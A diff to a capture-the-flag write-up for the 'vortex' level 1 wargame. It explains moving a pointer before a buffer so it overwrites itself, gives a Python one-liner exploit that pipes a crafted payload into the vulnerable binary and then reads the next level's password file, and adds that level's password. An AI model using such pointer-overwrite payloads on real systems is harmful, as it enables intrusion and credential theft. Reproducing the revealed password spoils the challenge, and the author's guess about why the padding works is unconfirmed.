configithub/vortex/level1/README.md

 So if we decrement ptr to point just before the beginning of buf by pushing '\', ptr points at itself, and we can change its value arbitrarily using the third option listed before.

-This works, but I do not know why I need to put all the chars after the ptr value change
+This works, but I do not know why exactly I need to put all the chars after the ptr value change.
+I strongly suspect that by adding this 4000 chars, we overflow the limit of chars in a single bash command, thus preventing the EOF character to appear.
+The EOF char would terminate the vortex1 process and thus our shell as well.
 ```
 python -c 'print "\\"*0x105+"\xcaXXXXXXXX" + "\\" + "z"*4000 + "\nwhoami\n" + "cat /etc/vortex_pass/vortex2\n"' | ./vortex1
 ```

+level2 pass :

+23anbT\rE